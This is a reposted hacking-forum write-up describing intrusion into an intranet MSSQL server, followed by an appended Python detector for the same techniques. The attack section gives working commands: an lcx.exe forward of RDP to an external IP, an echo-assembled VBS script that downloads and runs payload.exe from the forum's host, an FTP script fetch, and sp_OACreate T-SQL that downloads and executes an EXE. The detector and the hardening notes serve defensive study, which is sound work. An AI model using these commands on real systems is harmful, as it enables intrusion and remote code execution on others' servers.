This article is reposted from: http://bbs.blackbap.org/thread-6203-1-2.html
1. The server sits in an intranet, with the web front end and the database on separate hosts. The sa account password for the database server was found in Web.config, and a user was successfully added (192.168.0.206).
2. Both the web server (192.168.0.203) and the database server (192.168.0.206) run Symantec antivirus, so the lcx.exe forwarding tool cannot be used.
3. Other forwarding tools were tested: they were either flagged by the antivirus or unusable. The reDuh tool can only forward the current IP, and it is very slow, unbearably so 0.0.
4. The EXE generated with msfpayload is also flagged by the antivirus; because the server is x64 and msfencode has no x64 encoder, the reverse connection failed.
Idea 1: Turn off the antivirus and download the file with the commands below (not tested).
Idea 2: Use an MSF aspx reverse shell, then forward and pivot across the routed segments (succeeded).
Normal thinking: if there were no antivirus, run lcx.exe directly on 192.168.0.203 and forward 192.168.0.206 with the following command:
C:\lcx.exe -slave <your external IP> 51 192.168.0.206 3389  // after seeing this, you all know what it does 0.0
DOS commands (execute one line at a time):
- echo Set Post = CreateObject("Msxml2.xmlhttp") >>xxx.vbs
- echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
- echo Post.open "GET", "Http://bbs.blackbap.org/payload.exe", 0 >>xxx.vbs
- echo Post.send() >>xxx.vbs
- echo Set Aget = CreateObject("ADODB.Stream") >>xxx.vbs
- echo Aget.mode = 3 >>xxx.vbs
- echo Aget.type = 1 >>xxx.vbs
- echo Aget.open() >>xxx.vbs
- echo Aget.write(Post.responsebody) >>xxx.vbs
- echo Aget.savetofile "C:\xxx.exe", 2 >>xxx.vbs
- echo Wscript.Sleep >>xxx.vbs
- echo Shell.run("C:\xxx.exe") >>xxx.vbs
- echo open 127.0.0.1 >c:\ftp.dat
- echo Admin >>c:\ftp.dat
- echo Admin >>c:\ftp.dat
- echo binary >>c:\ftp.dat
- echo get lcx.exe >>c:\ftp.dat
- echo bye >>c:\ftp.dat
- ftp -s:c:\ftp.dat
MSSQL commands:
- DECLARE @js int
- EXEC sp_OACreate 'ScriptControl', @js out
- EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
- EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new ActiveXObject("Microsoft.XMLHTTP"); x.open("GET", "<url>", 0); x.send(); var s = new ActiveXObject("ADODB.Stream"); s.mode = 3; s.type = 1; s.open(); s.write(x.responsebody); s.savetofile("c:\\windows\\<name of the EXE to save>.exe", 2); var r = new ActiveXObject("Wscript.Shell"); r.run("c:\\windows\\<name of the EXE to save>.exe");'
- declare @o int, @f int, @t int, @ret int
- exec sp_OACreate 'Scripting.FileSystemObject', @o out
- exec sp_OAMethod @o, 'CreateTextFile', @f out, 'C:\1.bat', 1
- exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'open <FTP server IP>'
- exec @ret = sp_OAMethod @f, 'WriteLine', NULL, '<FTP account>'
- exec @ret = sp_OAMethod @f, 'WriteLine', NULL, '<FTP password>'
- exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'get lcx.exe'
- exec @ret = sp_OAMethod @f, 'WriteLine', NULL, 'bye'
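As an added example (not part of the original post), the following Python detection logic covers both tool-less techniques shown above from the defender's side: it scans process-creation command lines for the echo-assembled VBS downloader and the `ftp -s:` script trick, and scans captured T-SQL text for sp_OACreate/sp_OAMethod calls that drive the same COM objects. The sample command lines and SQL statements are constructed, not real telemetry; the finding field names, the two-token threshold and the `example.invalid` URL are assumptions.

```python
"""Detection logic for the living-off-the-land patterns in this write-up.

Added example, not part of the original post. Scans (1) process-creation
command lines for the echo-assembled VBS downloader and `ftp -s:` usage, and
(2) captured T-SQL text for sp_OA* calls that instantiate download/execute COM
objects. Sample inputs are constructed; field names and thresholds are assumptions.
"""
import re

# Building blocks of the echo-built downloader; one alone is common,
# several appended to the same .vbs file is the signal.
VBS_DOWNLOADER_TOKENS = (
    "createobject", "xmlhttp", "adodb.stream", "savetofile",
    "responsebody", "wscript.shell", ".run(",
)
# OLE Automation procedures that let T-SQL create arbitrary COM objects.
OA_PROCS = ("sp_oacreate", "sp_oamethod", "sp_oasetproperty", "sp_oagetproperty")
# COM objects used for download-and-execute from T-SQL.
COM_TOKENS = ("activexobject", "xmlhttp", "adodb.stream", "wscript.shell", "scriptcontrol")

ECHO_APPEND_RE = re.compile(r'\becho\b.*>>\s*"?([^\s"]+\.vbs)\b', re.IGNORECASE)
FTP_SCRIPT_RE = re.compile(r"\bftp(\.exe)?\s+[-/]s:", re.IGNORECASE)

# Constructed sample command lines, as a process-creation log would record them.
SAMPLE_CMDLINES = [
    'cmd.exe /c echo Set Post = CreateObject("Msxml2.xmlhttp") >>x.vbs',
    'cmd.exe /c echo Set Aget = CreateObject("ADODB.Stream") >>x.vbs',
    'cmd.exe /c echo Aget.savetofile "C:\\x.exe", 2 >>x.vbs',
    'cmd.exe /c echo Shell.run("C:\\x.exe") >>x.vbs',
    "cmd.exe /c ftp -s:c:\\ftp.dat",
    "notepad.exe C:\\notes.txt",
]

# Constructed sample T-SQL statements, as a SQL audit or trace might capture them.
SAMPLE_SQL = [
    "EXEC sp_OACreate 'ScriptControl', @js out",
    "EXEC sp_OAMethod @js, 'Eval', NULL, "
    "'var x = new ActiveXObject(\"Microsoft.XMLHTTP\"); x.open(\"GET\", \"http://example.invalid/a.exe\", 0);'",
    "SELECT name FROM sys.databases",
]


def scan_cmdlines(cmdlines):
    """Return findings for echo>>*.vbs downloader assembly and ftp -s: usage.

    Echo lines are grouped by the .vbs file they append to, so the verdict rests
    on how many distinct downloader building blocks reached one file rather than
    on any single harmless-looking echo.
    """
    tokens_per_file = {}
    findings = []
    for line in cmdlines:
        low = line.lower()
        m = ECHO_APPEND_RE.search(line)
        if m:
            target = m.group(1).lower()
            hits = tokens_per_file.setdefault(target, set())
            hits.update(t for t in VBS_DOWNLOADER_TOKENS if t in low)
        if FTP_SCRIPT_RE.search(line):
            findings.append({"kind": "ftp_script", "severity": "medium", "evidence": line})
    for target, hits in tokens_per_file.items():
        if len(hits) >= 2:  # threshold is an assumption; tune on real telemetry
            findings.append({"kind": "echo_vbs_downloader", "severity": "high",
                             "evidence": target, "tokens": sorted(hits)})
    return findings


def scan_sql(statements):
    """Return a finding for every statement that calls an sp_OA* procedure;
    severity is high when a download/execute COM object is named in the text."""
    findings = []
    for stmt in statements:
        low = stmt.lower()
        procs = [p for p in OA_PROCS if p in low]
        if not procs:
            continue
        com = [t for t in COM_TOKENS if t in low]
        findings.append({"kind": "ole_automation", "severity": "high" if com else "medium",
                         "evidence": stmt, "procs": procs, "com_objects": com})
    return findings


def scan_all(cmdlines, statements):
    """Combined findings from both sources."""
    return scan_cmdlines(cmdlines) + scan_sql(statements)


if __name__ == "__main__":
    for f in scan_all(SAMPLE_CMDLINES, SAMPLE_SQL):
        print(f["severity"].upper(), f["kind"], "->", f["evidence"])
```

The sp_OA* procedures only work while the server option 'Ole Automation Procedures' is enabled, which is off by default and requires sysadmin rights to change, so an unexpected enabled value in sys.configurations, or any sp_OACreate call arriving through the web application's login, is worth alerting on by itself. The root cause in this write-up is the sa password sitting in Web.config: a web application connecting with a low-privilege database login cannot reach sp_configure or sp_OACreate at all.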
Infiltration thinking of the separation of the MSSQL Station library